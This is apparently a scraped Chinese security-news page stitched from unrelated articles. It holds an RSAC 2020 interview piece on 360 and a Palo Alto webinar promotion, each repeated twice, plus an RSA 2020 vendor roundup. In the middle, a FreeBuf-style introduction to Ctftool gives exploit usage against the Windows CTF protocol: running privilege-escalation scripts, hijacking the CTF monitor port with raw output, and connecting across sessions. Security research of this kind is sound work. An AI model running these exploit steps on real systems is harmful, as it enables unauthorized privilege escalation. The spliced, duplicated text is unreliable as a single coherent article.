美国时间2月28日,全球安全顶会RSAC 2020即将落幕。这场在美国旧金山举行的“安全奥林匹克”吸引了来自全球知名信息安全企业、行业决策者和资深专家学者40000余人参会。

受到新冠肺炎疫情冲击,国内仅有7家厂商赴会。作为这7家参展厂商之一的360,带来了360安全大脑、汽车安全大脑、家庭安全大脑、360BugCloud等产品,展示了360在全网安全大数据、威胁情报、知识库、安全专家等方面的积累与实力。

在此期间,360董事长兼CEO周鸿祎、360首席安全官杜跃进也带来了自己对安全技术、趋势的思考与感悟。

唯武器论和人机结合论

第五届中国互联网安全大会ISC 2017曾以“万物皆变,人是安全的尺度”为主题,探讨人与互联网安全的耦合作用,表达了在安全防御的闭环里人是绕不过的环节。

而RSAC 2020 以“Human  Element”人是安全要素为主题,在杜跃进看来有两层含义。

一方面,人是不可控且复杂的因素,除了公司以外还有家庭、朋友等社交网络。对于需要安全防护的企业客户来说,人这一环节与其他环节的联系始终是很大的安全挑战。这也是近年很多安全服务方不断开展针对企业员工安全意识和安全技能测试和培训的原因。

另一方面,对于安全厂商人的因素同样是不可控且复杂的。从哲学的角度体现,就是唯武器论与人机结合论的博弈。唯武器论表达的是防御全靠技术,一个产品可以抵挡所有黑客攻击。杜跃进表示,他不同意这一观点,“网络安全的最后战场依然是人与人的对抗,而不是程序与程序的对抗,至少到目前为止,还做不到靠纯粹的自动化、人工智能与真实的攻击者对抗。”

因此,越来越多安全厂商认识到,卖给用户产品并不能为用户真正解决问题,还需要与安全专家的能力结合。从这一角度来说,供应商需要有强大的专家能力结合产品能力提供服务,或者用户有专业人才能力并进行人机结合,才能解决安全问题。

大数据与安全的平衡

今年的RSAC创新沙盒大赛前十强中有三家数据安全公司,摘得金牌的美国企业SECURITI.ai就是一家数据隐私保护类公司。这一结果与杜跃进之前的预期相差无几。

无论在投资圈或是产业圈,数据安全一直占据安全关键词首位。尽管其被关注已有三年,仍算一个“新”问题,诸如GDPR之类政策带来的市场显而易见,但具体落地仍是盲区。接连不断的数据安全问题以及国内外相关法律标准的制定,使我们在对大数据安全过度恐惧之下采取了一系列措施,也导致了部分数据空白。

比如在这次抗击疫情期间,大数据凸显出了关键作用,但在分析过去某些数据时发现了缺失。“当我们从IT时代进入DT时代,数据经济是不同的,IT时代是先出现业务才寻找数据,而DT时代是先有数据才有业务创新。”

因此,这里需要一个平衡,从国家的角度来看,要提升应急管理能力,离不开大数据,但用大数据需要考虑安全。如何能让大数据在发挥作用的同时不出现安全问题?这也是合规产生的需求,数据从法律标准的合规需求、企业自己的内需到现实中国家和社会遇到的问题,都离不开安全。  

如果这样看的话,RSA创新沙盒大赛前十家中三家是数据安全公司,也证明了这一趋势:太多用户需求没有被满足,大家意识到这个问题但找不到合适的产品和解决方案,这是一个快速成长的过程。

从RSAC2020 看未来安全新趋势

周鸿祎分享了本次RSA之行中总结的三个安全趋势:

第一,未来安全产品不单是最基础的合规,仅仅解决“有和无”的问题,而是由能力驱动,能不能解决客户的问题,会变成一个很重要的衡量标准;

其二是大数据采集和分析,如360安全大脑,未来无论是EDR还是CDR,这种数据探针将对整个企业内部各个层次、各个设备、各个系统用大数据的采集,并基于比较完整的大数据来对外部威胁做分析,以后是一个必然的方向;

最后是在大数据汇聚方面,SDR肯定要超越SEM,未来很多基础性的工作未来一定会趋向自动化,但是企业安全的防护却会越来越多的依赖专家服务,尤其面对高级威胁攻击(APT攻击)时候。

image.png

360董事长兼CEO周鸿祎

这也是为什么他会来RSAC 2020,有三个目的:

首先,2019年9月,360重新制定了政企战略,不仅限于单纯给客户提供软硬件产品。作为全球网络安全大数据最多的公司之一,360可以利用网络安全大数据帮助国家发现和应对国家级APT攻击,过去几年内360发现了超过40起有组织的APT攻击,背后的关键技术就是360安全大脑,其基于大范围、长时间、多维度的安全大数据,综合运用大数据分析、机器学习以及人机结合等关键技术,是实现网络安全防御智能升级的雷达系统。

“我想向国际介绍360安全大脑的理念,并得到国际安全同行的认同。”

参观了众多展位后,他发现不少新兴公司与360技术路线非常吻合,大家都开始尽可能在收集数据,利用大数据分析寻找攻击,也越来越意识到安全是一个整体问题,依靠单点安全设备只能应对一些小毛贼,无法看见隐蔽的国家级攻击。

其次,网络安全问题并非靠一家企业能够解决,360也只是做了能够发现攻击的雷达,企业和政府的安全需要更多好的技术一起解决。他希望把国际上不错的新技术带到中国。

最后,作为一个RSAC的“忠粉”,老周更希望中国的网络安全产业有类似激励创新、产业合作交流的环境。过去七年,他打造了“中国版”RSAC大会——中国互联网安全大会(ISC),也尝试学习了沙盒比赛这种形式,希望能建立另外的价值观:衡量一个公司,并非以短期的市值和收入为标准,而是以创新力、以其细分市场的敏锐度、以其解决问题,为客户创造价值等角度评判,培养真正有创意,有前瞻性,对未来有预见的公司,能够看到未来几年可能出现的安全问题,并有解决的思路和方向。

在他看来,只有这样的大会才有资格成为中国的RSAC,网络安全行业十分特殊,如果大家不能携手对抗网上的黑产和犯罪,最后所有人都是输家,没有人会是幸存者。

美国时间2月28日,全球安全顶会RSAC 2020即将落幕。这场在美国旧金山举行的“安全奥林匹克”吸引了来自全球知名信息安全企业、行业决策者和资深专家学者40000余人参会。

受到新冠肺炎疫情冲击,国内仅有7家厂商赴会。作为这7家参展厂商之一的360,带来了360安全大脑、汽车安全大脑、家庭安全大脑、360BugCloud等产品,展示了360在全网安全大数据、威胁情报、知识库、安全专家等方面的积累与实力。

在此期间,360董事长兼CEO周鸿祎、360首席安全官杜跃进也带来了自己对安全技术、趋势的思考与感悟。

唯武器论和人机结合论

第五届中国互联网安全大会ISC 2017曾以“万物皆变,人是安全的尺度”为主题,探讨人与互联网安全的耦合作用,表达了在安全防御的闭环里人是绕不过的环节。

而RSAC 2020 以“Human  Element”人是安全要素为主题,在杜跃进看来有两层含义。

一方面,人是不可控且复杂的因素,除了公司以外还有家庭、朋友等社交网络。对于需要安全防护的企业客户来说,人这一环节与其他环节的联系始终是很大的安全挑战。这也是近年很多安全服务方不断开展针对企业员工安全意识和安全技能测试和培训的原因。

另一方面,对于安全厂商人的因素同样是不可控且复杂的。从哲学的角度体现,就是唯武器论与人机结合论的博弈。唯武器论表达的是防御全靠技术,一个产品可以抵挡所有黑客攻击。杜跃进表示,他不同意这一观点,“网络安全的最后战场依然是人与人的对抗,而不是程序与程序的对抗,至少到目前为止,还做不到靠纯粹的自动化、人工智能与真实的攻击者对抗。”

因此,越来越多安全厂商认识到,卖给用户产品并不能为用户真正解决问题,还需要与安全专家的能力结合。从这一角度来说,供应商需要有强大的专家能力结合产品能力提供服务,或者用户有专业人才能力并进行人机结合,才能解决安全问题。

大数据与安全的平衡

今年的RSAC创新沙盒大赛前十强中有三家数据安全公司,摘得金牌的美国企业SECURITI.ai就是一家数据隐私保护类公司。这一结果与杜跃进之前的预期相差无几。

无论在投资圈或是产业圈,数据安全一直占据安全关键词首位。尽管其被关注已有三年,仍算一个“新”问题,诸如GDPR之类政策带来的市场显而易见,但具体落地仍是盲区。接连不断的数据安全问题以及国内外相关法律标准的制定,使我们在对大数据安全过度恐惧之下采取了一系列措施,也导致了部分数据空白。

比如在这次抗击疫情期间,大数据凸显出了关键作用,但在分析过去某些数据时发现了缺失。“当我们从IT时代进入DT时代,数据经济是不同的,IT时代是先出现业务才寻找数据,而DT时代是先有数据才有业务创新。”

因此,这里需要一个平衡,从国家的角度来看,要提升应急管理能力,离不开大数据,但用大数据需要考虑安全。如何能让大数据在发挥作用的同时不出现安全问题?这也是合规产生的需求,数据从法律标准的合规需求、企业自己的内需到现实中国家和社会遇到的问题,都离不开安全。  

如果这样看的话,RSA创新沙盒大赛前十家中三家是数据安全公司,也证明了这一趋势:太多用户需求没有被满足,大家意识到这个问题但找不到合适的产品和解决方案,这是一个快速成长的过程。

从RSAC2020 看未来安全新趋势

周鸿祎分享了本次RSA之行中总结的三个安全趋势:

第一,未来安全产品不单是最基础的合规,仅仅解决“有和无”的问题,而是由能力驱动,能不能解决客户的问题,会变成一个很重要的衡量标准;

其二是大数据采集和分析,如360安全大脑,未来无论是EDR还是CDR,这种数据探针将对整个企业内部各个层次、各个设备、各个系统用大数据的采集,并基于比较完整的大数据来对外部威胁做分析,以后是一个必然的方向;

最后是在大数据汇聚方面,SDR肯定要超越SEM,未来很多基础性的工作未来一定会趋向自动化,但是企业安全的防护却会越来越多的依赖专家服务,尤其面对高级威胁攻击(APT攻击)时候。

image.png

360董事长兼CEO周鸿祎

这也是为什么他会来RSAC 2020,有三个目的:

首先,2019年9月,360重新制定了政企战略,不仅限于单纯给客户提供软硬件产品。作为全球网络安全大数据最多的公司之一,360可以利用网络安全大数据帮助国家发现和应对国家级APT攻击,过去几年内360发现了超过40起有组织的APT攻击,背后的关键技术就是360安全大脑,其基于大范围、长时间、多维度的安全大数据,综合运用大数据分析、机器学习以及人机结合等关键技术,是实现网络安全防御智能升级的雷达系统。

“我想向国际介绍360安全大脑的理念,并得到国际安全同行的认同。”

参观了众多展位后,他发现不少新兴公司与360技术路线非常吻合,大家都开始尽可能在收集数据,利用大数据分析寻找攻击,也越来越意识到安全是一个整体问题,依靠单点安全设备只能应对一些小毛贼,无法看见隐蔽的国家级攻击。

其次,网络安全问题并非靠一家企业能够解决,360也只是做了能够发现攻击的雷达,企业和政府的安全需要更多好的技术一起解决。他希望把国际上不错的新技术带到中国。

最后,作为一个RSAC的“忠粉”,老周更希望中国的网络安全产业有类似激励创新、产业合作交流的环境。过去七年,他打造了“中国版”RSAC大会——中国互联网安全大会(ISC),也尝试学习了沙盒比赛这种形式,希望能建立另外的价值观:衡量一个公司,并非以短期的市值和收入为标准,而是以创新力、以其细分市场的敏锐度、以其解决问题,为客户创造价值等角度评判,培养真正有创意,有前瞻性,对未来有预见的公司,能够看到未来几年可能出现的安全问题,并有解决的思路和方向。

在他看来,只有这样的大会才有资格成为中国的RSAC,网络安全行业十分特殊,如果大家不能携手对抗网上的黑产和犯罪,最后所有人都是输家,没有人会是幸存者。

      一场突如其来的新冠疫情正在全球肆虐,面对这场没有硝烟的战,全中国,乃至全世界都在众志成城,抗击疫情。

古人有云:工欲善其事,必先利其器。而在01的世界里,面对网络病毒和恶意软件的侵袭,我们更需要未雨绸缪,正所谓知己知彼,方可百战不殆!

 

202031213:30~17:05 

安全+ 将携手 Palo Alto Networks(派拓网络)  

为您开启这场网络安全盛会!

 

我们诚邀多位安全负责人来分享他们在各自领域的见解、专业知识和最佳实践。共同交流探讨企业信息安全实践及面临的安全威胁,同时全面解析数字时代的网络安全核心技术在重点行业及领域应用的成功案例及创新安全理念。  

创新的网络盛会形式,让您无论身处何地,都可以亲身参与这场安全界的饕餮盛宴!

 

 

不容错过的峰会亮点

 

19场精彩技术专题演讲在线直播

来自”保护企业安全”,” 保护云安全”, “保护未来安全”三大分会场,超过数十场精彩技术专题演讲在线分享,涵盖SD-WAN、网安法、等保2.0、零信任、端点安全、云安全、威胁防御、容器技术、态势感知、风控安全、开发安全、隐私数据保护等众多应用及解决方案。  

 

安全大咖云集

重量级的安全大咖在线分享,用全新视角透析安全未来发展的动态,解答您所面临的棘手难题,让您在洞悉趋势的同时与来自各行业翘楚共襄盛举。  

 

超实用资源与文档等待下载

虚拟展厅中配备“资源中心”,超多干货,技术白皮书、白板培训视频教程、产品介绍、培训资源都已上传,静静等待您的下载。 

 

 

您可通过扫描图中二维码参与本次大会

1582765401

或复制链接

https://www.bagevent.com/event/6378071


      一场突如其来的新冠疫情正在全球肆虐,面对这场没有硝烟的战,全中国,乃至全世界都在众志成城,抗击疫情。

古人有云:工欲善其事,必先利其器。而在01的世界里,面对网络病毒和恶意软件的侵袭,我们更需要未雨绸缪,正所谓知己知彼,方可百战不殆!

 

202031213:30~17:05 

安全+ 将携手 Palo Alto Networks(派拓网络)  

为您开启这场网络安全盛会!

 

我们诚邀多位安全负责人来分享他们在各自领域的见解、专业知识和最佳实践。共同交流探讨企业信息安全实践及面临的安全威胁,同时全面解析数字时代的网络安全核心技术在重点行业及领域应用的成功案例及创新安全理念。  

创新的网络盛会形式,让您无论身处何地,都可以亲身参与这场安全界的饕餮盛宴!

 

 

不容错过的峰会亮点

 

19场精彩技术专题演讲在线直播

来自”保护企业安全”,” 保护云安全”, “保护未来安全”三大分会场,超过数十场精彩技术专题演讲在线分享,涵盖SD-WAN、网安法、等保2.0、零信任、端点安全、云安全、威胁防御、容器技术、态势感知、风控安全、开发安全、隐私数据保护等众多应用及解决方案。  

 

安全大咖云集

重量级的安全大咖在线分享,用全新视角透析安全未来发展的动态,解答您所面临的棘手难题,让您在洞悉趋势的同时与来自各行业翘楚共襄盛举。  

 

超实用资源与文档等待下载

虚拟展厅中配备“资源中心”,超多干货,技术白皮书、白板培训视频教程、产品介绍、培训资源都已上传,静静等待您的下载。 

 

 

您可通过扫描图中二维码参与本次大会

1582765401

或复制链接

https://www.bagevent.com/event/6378071


Ctftool是一款交互式的命令行工具,可以帮助安全研究人员对CTF(Windows平台下用于实现文本服务的协议)进行安全测试。在Ctftool的帮助下,安全研究人员可以轻松对Windows内部运行和调试文本输入处理器的复杂问题进行分析,并检测目标Windows系统的安全性。

除此之外,Ctftool还允许研究人员根据自己的需要来编写一些简单的脚本来实现与CTF客户端或服务器端的自动化交互,以及执行简单的模糊测试任务。

工具下载

广大研究人员可以使用下列命令将项目源码克隆至本地:

git clone https://github.com/taviso/ctftool.git

项目构建

注意:如果你不想自己构建项目源码的话,你可以直接访问该项目的Release页面来下载编译好的版本。

我们使用了GNU make和Visual Studio 2019来开发Ctftool,目前该项目仅支持32位版本,但是该工具支持在Windows x86和x64平台上运行。

安装好所有的依赖组件之后,直接在开发者命令行终端中输入“make”命令即可完成项目构建。

这里,我使用的构建工具是一个变种版本的Visual Studio,构建时我只选择了MSVC、MSBuild、CMake和SDK。

这个项目使用了子模块来处理部分依赖,你可以使用下列命令来获取所需的依赖代码:

git submodule update --init --recursive

工具使用

Ctftool目前已在Windows 7、Windows 8和Windows 10上进行了测试,并且支持32位和64位版本。

广大演技人员可以使用“help”命令来查看该工具支持的命令列表,或者输入“help <command>”来查看具体命令的使用方式:

$ ./ctftool.exe
An interactive ctf exploration tool by @taviso.
Type "help" for available commands.
Most commands require a connection, see "help connect".
ctf> help
Type `help <command>` for help with a specific command.
Any line beginning with # is considered a comment.

help            - List available commands.
exit            - Exit the shell.
connect         - Connect to CTF ALPC Port.
info            - Query server informaiton.
scan            - Enumerate connected clients.
callstub        - Ask a client to invoke a function.
createstub      - Ask a client to instantiate CLSID.
hijack          - Attempt to hijack an ALPC server path.
sendinput       - Send keystrokes to thread.
setarg          - Marshal a parameter.
getarg          - Unmarshal a parameter.
wait            - Wait for a process and set it as the default thread.
thread          - Set the default thread.
sleep           - Sleep for specified milliseconds.
forget          - Forget all known stubs.
stack           - Print the last leaked stack ptr.
marshal         - Send command with marshalled parameters.
proxy           - Send command with proxy parameters.
call            - Send command without appended data.
window          - Create and register a message window.
patch           - Patch a marshalled parameter.
module          - Print the base address of a module.
module64        - Print the base address of a 64bit module.
editarg         - Change the type of a marshalled parameter.
symbol          - Lookup a symbol offset from ImageBase.
set             - Change or dump various ctftool parameters.
show            - Show the value of special variables you can use.
lock            - Lock the workstation, switch to Winlogon desktop.
repeat          - Repeat a command multiple times.
run             - Run a command.
script          - Source a script file.
print           - Print a string.
consent         - Invoke the UAC consent dialog.
reg             - Lookup a DWORD in the registry.
gadget          - Find the offset of a pattern in a file.
section         - Lookup property of PE section.
Most commands require a connection, see "help connect".
ctf>

拿到工具之后,我们首先要做的就是建立会话链接,并且查看已连接的客户端:

ctf> connect
The ctf server port is located at \BaseNamedObjects\msctf.serverDefault1
NtAlpcConnectPort("\BaseNamedObjects\msctf.serverDefault1") => 0
Connected to CTF [email protected]\BaseNamedObjects\msctf.serverDefault1, Handle 00000264
ctf> scan
Client 0, Tid 3400 (Flags 0x08, Hwnd 00000D48, Pid 8696, explorer.exe)
Client 1, Tid 7692 (Flags 0x08, Hwnd 00001E0C, Pid 8696, explorer.exe)
Client 2, Tid 9424 (Flags 0x0c, Hwnd 000024D0, Pid 9344, SearchUI.exe)
Client 3, Tid 12068 (Flags 0x08, Hwnd 00002F24, Pid 12156, PROCEXP64.exe)
Client 4, Tid 9740 (Flags 0000, Hwnd 0000260C, Pid 3840, ctfmon.exe)

接下来,我们就可以通过向服务器端发送或接受命令,来对已连接的客户端进行测试。

漏洞利用

该工具可以用来扫描和发现CTF协议中许多严重的安全问题,如果你想在Windows 10 x64 1903上运行该工具并测试漏洞,可以直接双击运行ctftool.exe,并运行下列命令:

An interactive ctf exploration tool by @taviso.
Type "help" for available commands.
Most commands require a connection, see "help connect".
ctf> script .\scripts\ctf-consent-system.ctf

实际上,漏洞利用代码会分为两个阶段运行,因此我们也可以单独执行这两个阶段的代码。比如说,你可能想要入侵的进程属于不同会话上的同一个用户,此时可以使用connect命令的可选参数。

接下来,你可以建立一条会话链接,选择一个需要入侵的客户端,然后运行下列命令:

ctf> script .\scripts\ctf-exploit-common-win10.ctf

监控劫持

由于CTF协议中的客户端跟服务器端之间不需要身份认证,那么如果攻击者有权限写入\BaseNamedObjects的话,他就可以创建CTF ALPC端口,并伪装成监控器。

此时,攻击者将能够绕过监视器以及所有限制来执行任何操作。

使用“hijack”命令即可实现:

An interactive ctf exploration tool by @taviso.
Type "help" for available commands.
ctf> hijack Default 1
NtAlpcCreatePort("\BaseNamedObjects\msctf.serverDefault1") => 0 00000218
NtAlpcSendWaitReceivePort("\BaseNamedObjects\msctf.serverDefault1") => 0 00000218
000000: 18 00 30 00 0a 20 00 00 00 11 00 00 44 11 00 00  ..0.. ......D...
000010: a4 86 00 00 b7 66 b8 00 00 11 00 00 44 11 00 00  .....f......D...
000020: e7 12 01 00 0c 00 00 00 80 01 02 00 20 10 d6 05  ............ ...
A a message received
        ProcessID: 4352, SearchUI.exe
        ThreadId: 4420
        WindowID: 00020180
NtAlpcSendWaitReceivePort("\BaseNamedObjects\msctf.serverDefault1") => 0 00000218
000000: 18 00 30 00 0a 20 00 00 ac 0f 00 00 0c 03 00 00  ..0.. ..........
000010: ec 79 00 00 fa 66 b8 00 ac 0f 00 00 0c 03 00 00  .y...f..........
000020: 12 04 01 00 08 00 00 00 10 01 01 00 00 00 00 00  ................
A a message received
        ProcessID: 4012, explorer.exe
        ThreadId: 780
        WindowID: 00010110
NtAlpcSendWaitReceivePort("\BaseNamedObjects\msctf.serverDefault1") => 0 00000218
000000: 18 00 30 00 0a 20 00 00 ac 0f 00 00 0c 03 00 00  ..0.. ..........
000010: fc 8a 00 00 2a 67 b8 00 ac 0f 00 00 0c 03 00 00  ....*g..........
000020: 12 04 01 00 08 00 00 00 10 01 01 00 58 00 00 00  ............X...
A a message received
        ProcessID: 4012, explorer.exe
        ThreadId: 780
...

跨会话攻击

在CTF协议中,不存在会话隔离,任何进程都可以跟任意CTF服务器进行连接。Ctftool工具中的“connect”命令支持连接至非默认会话:

An interactive ctf exploration tool by @taviso.
Type "help" for available commands.
Most commands require a connection, see "help connect".
ctf> help connect
Connect to CTF ALPC Port.

Usage: connect [DESKTOPNAME SESSIONID]
Without any parameters, connect to the ctf monitor for the current
desktop and session. All subsequent commands will use this connection
for communicating with the ctf monitor.

If a connection is already open, the existing connection is closed first.

If DESKTOPNAME and SESSIONID are specified, a connection to ctf monitor
for another desktop and session are opened, if it exists.
If the specified port does not exist, wait until it does exist. This is
so that you can wait for a session that hasn't started
yet in a script.
Examples
 Connect to the monitor for current desktop
  ctf> connect
 Connect to a specific desktop and session.
  ctf> connect Default 1
Most commands require a connection, see "help connect".

项目地址

Ctftool:【GitHub传送门

参考资料

1、https://googleprojectzero.blogspot.com/2019/08/down-rabbit-hole.html

* 参考来源:taviso,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

美国当地时间2月24日至2月28日,RSA 2020在旧金山 Moscone 中心举办。RSA 2020以“Human Elements”(即人的因素)为主题,聚焦与“人”相关的元素对网络安全产生的影响。

图片1_副本.png

今年大会因受到疫情影响,近20%的参展厂商在大会举办前取消了行程,嘶吼此前统计RSA 2020年共677家机构参展,作为最重要的年度网络安全盛会之一,每年举办大会意在使世界安全研究者走到一起,探讨行业发展的最新技术、策略和解决方案。为让RSA大会的信息安全关注者了解现场展会情况,嘶吼整理汇总了中国参展厂商亮点及国外企业更新产品目录(机构排名不分前后)。

绿盟科技

展区亮点:抗D、云DPS、新一代WAF、威胁情报

图片2.png

抗DDoS产品:自2002年发布上市以来不断更新,保持市场活力。防护能力贴合业务场景及技术演进方向,推出了威胁情报IP溯源、僵尸主机快速过滤、APP业务自动化定向防护、云地自动清洗互联等功能。在性能上,目前支持单体最大240G防护用于大型节点防护的建设。产品形态同时具备硬件和虚拟化两种可选,为与云计算、SDN等前沿方案的融合提供实现基础。此外,产品在方案可扩展性上不断延伸,将单一产品的DDoS检测与清洗能力与平台相结合,孵化出攻击溯源、DDoS运营增值、流量分析等多种方案。

国际云清洗中心:在2020年,绿盟抗D整合了云清洗和本地设备的能力,实现了智能切换流量路线的云地联动整体方案。云清洗处理超大流量攻击,本地设备处理复杂应用层攻击,并且流量线路可根据攻击情况自动切换,仅有在流量超出本地处理能力时,ADS才会发出云呼救信号,将流量牵引至云绿盟国际云清洗中心进行清洗,应对大流量攻击这是国内首次实现全自动云地清洗切换。

流量清洗业务运营系统ADBOS:基于抗DDoS产品设计的管理、运维及运营的综合平台。通过智能管理、多点拨测,流量调度等方式,使多节点的清洗和检测设备可以进行统一管理及资源调用。迅速准确地对各类DDoS攻击流量进行过滤。给客户提供调度、管理、增值运营等功能,在确保业务可用性的同时给客户带来收益。ADBOS良好的兼容性使得第三方厂家的抗DDoS设备也可以在平台上进行统一调度,统一管理,统一查看。

新一代WAF:绿盟科技新一代WAF可保护客户Web业务和API安全。通过基于机器学习的智能检测引擎和海量威胁情报赋能,让WAF的检测能力进一步提升,并保护客户免受未知风险。同时具备资产自学习、细粒度策略配置以及策略自优化的专家系统,使得扩容和运维更加轻松。

威胁情报:依托绿盟科技专业的安全团队和强大的安全研究能力,对全球网络安全威胁和态势进行持续观察和分析,以威胁情报的生产、运营、应用等能力及关键技术作为核心研究内容,推出了绿盟威胁情报平台以及一系列集成威胁情报的新一代安全产品,为用户提供可操作的情报数据、专业的情报服务和高效的威胁防护能力。

360集团

展区亮点: 360安全大脑

图片3_副本.png

360安全大脑:是360公司推出的实现网络安全防御智能升级的雷达系统。其基于大范围、长时间、多维度的安全大数据,综合运用大数据分析、机器学习以及人机结合等关键技术,发现高级网络攻击的蛛丝马迹并“看见”攻击行为的全貌,最终帮助国家和客户应对各种网络安全威胁。基于360安全大脑的云服务能力,360还为客户提供安全大脑本地化落地方案,包括安全运营中心、威胁情报中心、实战攻防靶场、漏洞管理平台、网络培训学院和其他安全服务。

保护智能驾驶时代的汽车网络安全:360汽车安全大脑。该方案包括加装终端防护软件、车载联网防火墙、汽车专用安全芯片等,不仅能对车联网状态进行实时的可视化呈现,还可以结合安全大数据,对各种安全事件进行告警、预测、处置和记录,同时进行取证、溯源、分析、复盘。360汽车安全大脑可从芯片到云端进行汽车全面防护,实现实时动态防御,减少残余风险,保证出行安全。

面向未来的家庭“安全+AI”大脑:基于强大的深度学习算法,通过场景规则引擎,将安防事件智能分级,自动筛选出需要关注的可疑内容的一套视频分析系统。360家庭安全大脑可将360智能家庭安防体系中的智能门锁、摄像头、可视门铃等硬件设备连为一体,实现对家庭内外进行全天候无死角的安全守护,也为用户提供更进一步的主动防御系统和一体化智能生活体验。

360BugCloud:国内首家开源漏洞响应平台,致力于维护开源通用软件安全,针对开源通用型高危漏洞进行安全研究及应急响应的组织与平台。据数据显示,平台仅上线第一周就收到来自全球超300个开源高危漏洞,漏洞涉及政府、企、事业等上百余家单位,覆盖能源、金融、交通、医疗、电信、教育众多关键行业领域,挽救了全球数亿的价值损失,共同维护了开源软件及社区平台的安全。

奇安信

展区亮点: 内生安全、威胁情报、天眼

图片4.png

内生安全:该理念认为,需要通过“一个中心、五张滤网”,真正将安全融入网络、应用、数据和行为,与业务相结合,形成关口前移。这样的安全体系可以在信息化环境内不断生长出安全能力,形成自主、自适应和自成长的安全体系,极大降低网络攻击的风险。这其中,当信息化系统和安全系统升级换代,业务系统流程再造的时候,安全能力应该能动态提升,它的核心是人的进步和成长。

而这与本届大会“人为要素”的主题极其契合,均为在信息系统的规划和开发阶段到整个运维阶段,将安全要素贯彻其中,牢记“人为错误是安全漏洞的主要原因”,减少系统本身安全问题带来的潜在风险。

在大会的第三天联合以色列著名的网络安全公司Cyberbit发布网络安全培训超现实仿真平台——奇安信应急演练网络靶场,深度结合了奇安信安全产品以及安全能力,融合了多年以来在国内多个行业重要基础设施攻防演练中的技术和经验,通过对各个行业典型业务场景的模拟仿真,提供多技能组合模式下的场景训练,完成多行业典型业务场景、重点安全事件场景下的攻防应急演习。

奇安信投资部总经理蔡欣华表示,

Cyber Range是目前全球首屈一指的网络安全培训超现实仿真平台。通过与奇安信的合作能够将产品进行本地化定制。目前,奇安信应急演练网络靶场是国内适配行业场景最多、应用场景最多的网络靶场,同时也是第一家主要专注于应急演练的网络靶场。

图片5_副本.png

其中,凭借卓越的网络安全技术和服务能力,奇安信天眼和安全服务分别获得了美国知名网络安全杂志CDM(Cyber Defense Magazine)颁发的两项大奖:天眼新一代威胁感知系统荣获“Next Gen”大奖,安全服务荣获“Most Innovative”大奖。而这些安全产品及场景解决方案的核心理念,即为奇安信去年创新性提出的“内生安全”。

图片6.png

山石网科

展区亮点:SD-WAN、智能矩阵

山石网科作为企业网络安全和风险管理解决方案的领先供应商,在本届RSA 2020大会上发布智能矩阵理念。今年RSAC将主题定位Human Element(人的因素),这正与山石网科最新的智能矩阵理念不谋而合——人工智能和人类智慧在智能矩阵中完美结合,带来1+1>2的安全性能,使得智能矩阵不断成长、不断进化,更好的捍卫企业网络的安全。

山石网科首席技术官兼联合创始人刘向明表示:

智能矩阵理念代表着山石网科将致力于让我们与客户成为一体,保护他们的企业网络免受越来越多高级威胁的攻击。有了山石网科的安全解决方案,我们的客户将强化他们的安全防御和保护。我们很高兴能与RSA的观众分享山石网科网络安全解决方案的最新发展。

图片8_副本_副本.png

数据分析引擎:自2013年推出第一款产品,经多年发展现在多款产品内均有集成。RSAC大会上主要展出的是内网安全的产品,以及T系列的智能下一代防火墙这两款产品。

云安全解决方案CloudHive:关于数据中心的防护,着重推出了在X系列的最新的平台,1TB的防火墙、X10800系统,以及在虚拟化安全、云安全的环境下,虚拟化或者云的环境下的安全解决方案,即CloudHive,一个创新的分布式安全的这么一个产品。

SD-WAN:新一代企业分支机构解决方案,一个非常前瞻的技术,山石网科在去年底发布了SD-WAN的产品和解决方案。

国外企业更新产品目录:

思科:发布SecureX,一种新的云原生安全平台,旨在提高安全可见性、交付分析能力、自动化安全工作流程等,将思科Talos团队对于威胁研究的能力智能、自动化的输出。

Fortinet:发布FortiAI,一种利用深度神经网络(DNN)加快威胁修复速度,并减少耗时的虚拟安全分析师。

Adaptiva:发布Endpoint Health,这是一种针对客户端和服务器的自动运行状况和补救解决方案。该产品可在几分钟内在整个企业内进行111次“健康检查”,并自动修复问题(包括缺少安全补丁和配置问题)。

Palo Alto Networks:推出 Cortex XSOAR,一个集威胁情报管理和SOAR一体的平台,用户可通过该平台自动化数百种网络安全用例,以协调第三方产品响应。

F5 Networks:重点介绍了其应用程序安全产品组合中的几个新解决方案。Essential App Protect可提供针对常见Web利用,恶意API和协同攻击的保护;行为应用保护是一种云交付解决方案,可通过实时检测恶意行为来保护应用安全。NGINX App Protect将F5 WAF技术引入NGINX,而Aspen Mesh Secure Ingress帮助保护进入Kubernetes集群的流量。

CyberArk:增强了端点特权管理器的功能,防止工作站和服务器上的凭证被盗,并帮助防御者快速检测并主动关闭正在进行中的攻击进程。

McAfee:宣布了扩展MVISION平台,并增加了保护整个生态系统中的企业数据的功能和保护本机应用程序的整个基础架构和应用程序堆栈的功能。还启动了一个全球托管检测和响应(MDR)平台,提供诸如威胁搜寻,取证和调查以及全天候端点威胁检测和响应服务。

Intel:发布四项新的安全功能:应用程序隔离、VM和容器隔离、全内存加密和Intel平台固件弹性提升,并提供了有关其先前宣布的“计算生命周期保障”供应链透明度计划的更多信息。

Gurucul:发布一个云原生数据驱动的平台,用于自动化安全控制。包括用户和实体行为分析(UEBA)、网络流量分析(NTA)、日志聚合、SIEM、SOAR和威胁搜寻。借助机器学习和人工智能,该平台可帮助组织从网络、IT系统、云平台、应用程序、IoT和更多内容中提取和分析数据,以实时检测威胁。

Secureworks: 推出了 Cloud Configuration Review,这是一种云配置评估解决方案,是和VMware合作建立一体化服务中的第一个产品。该平台提供公共云安全性和合规性监视功能,以帮助检测配置漏洞,了解关键风险的业务影响以解决与采用公共云带来的相关挑战。

Imperva:发布Advanced Bot Protection,它将对僵尸程序的管理方案集成到其云安全解决方案中。提供了对单一堆栈模型中的漫游器保护,以保护网站、移动应用程序和API免受自动化威胁。

Proofpoint:推出了通过利用公司的安全电子邮件网关、威胁防护和响应、电子邮件身份验证、意识培训和云帐户保护来保护组织免受BEC和EAC攻击的解决方案。以及CASB解决方案的改进等内容。

BlackBerry:发布CylanceOPTICS v2.4,增强Spark平台的EPP和EDR功能。更新后的解决方案旨在通过改进DNS可见性、Windows登录事件可见性、RFC1918地址空间可见性以及通过Windows API增强WMI和PowerShell来提供更快的事件响应。

Keysight Technologies:发布提高运营安全性的平台,包括威胁模拟器漏洞和攻击模拟解决方案,该解决方案使网络和DevSecOps团队能够通过模拟网络上的攻击,来衡量运营安全性的有效性。

图片9_副本.jpg

注:

1)以上产品国内发布及更新时间请参考官网

2)更新目录参考内容:SECURITYWEEK、企业官方网站及官方社交媒体账户

